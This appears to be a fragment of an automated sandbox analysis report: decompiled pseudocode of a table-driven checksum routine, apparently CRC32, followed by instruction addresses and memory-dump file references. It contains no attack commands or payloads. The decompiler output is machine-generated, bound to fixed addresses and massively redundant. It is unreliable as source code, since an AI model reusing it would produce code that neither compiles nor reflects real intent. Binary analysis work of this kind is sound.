(_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x18) * 4) ^  *(0x413dc8 + (_t158 & 0x000000ff) * 4) ^ _t242[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t229 >> 0x18) * 4) ^  *(0x413dc8 + (_t229 & 0x000000ff) * 4) ^ _t242[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t163 >> 0x18) * 4) ^  *(0x413dc8 + (_t163 & 0x000000ff) * 4) ^  *_t164;
							_t146 =  &(_t164[1]);
							_t95 =  *(0x4135c8 + (_t234 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (_t234 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t234 >> 0x18) * 4) ^  *(0x413dc8 + (_t234 & 0x000000ff) * 4);
							_t246 = _t246 - 1;
						} while (_t246 != 0);
					}
					if(_t236 >= 4) {
						_t241 = _t236 >> 2;
						do {
							_t98 = _t95 ^  *_t146;
							_t236 = _t236 - 4;
							_t146 = _t146 + 4;
							_t95 =  *(0x4135c8 + (_t98 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (_t98 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t98 >> 0x18) * 4) ^  *(0x413dc8 + (_t98 & 0x000000ff) * 4);
							_t241 = _t241 - 1;
						} while (_t241 != 0);
					}
					if(_t236 != 0) {
						do {
							_t165 =  *_t146 & 0x000000ff;
							_t146 = _t146 + 1;
							_t95 = _t95 >> 0x00000008 ^  *(0x4131c8 + ((_t165 ^ _t95) & 0x000000ff) * 4);
							_t236 = _t236 - 1;
						} while (_t236 != 0);
					}
					return  !_t95;
				} else {
					return _t93;
				}
			}

0x004102d0
0x004102d6
0x004102d9
0x004107b5
0x004107b9
0x004107bc
0x004107c2
0x004107c4
0x004107c9
0x004107cc
0x004107d8
0x004107df
0x004107e0
0x00000000
0x00000000
0x00000000
0x004107e0
0x004107c4
0x004107e2
0x004107e6
0x004107ef
0x004107f2
0x0041082e
0x00410836
0x0041083a
0x00410928
0x0041094e
0x00410967
0x0041096a
0x0041096f
0x004109a3
0x004109ac
0x004109ae
0x004109e3
0x004109ea
0x004109ea
0x004109f1
0x004109f5
0x004109f9
0x00410a00
0x00410a00
0x00410a02
0x00410a0c
0x00410a42
0x00410a44
0x00410a44
0x00410a00
0x00410a4a
0x00410a50
0x00410a50
0x00410a53
0x00410a61
0x00410a68
0x00410a68
0x00410a50
0x00410a6f
0x004102d8
0x004102d8
0x004102d8

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
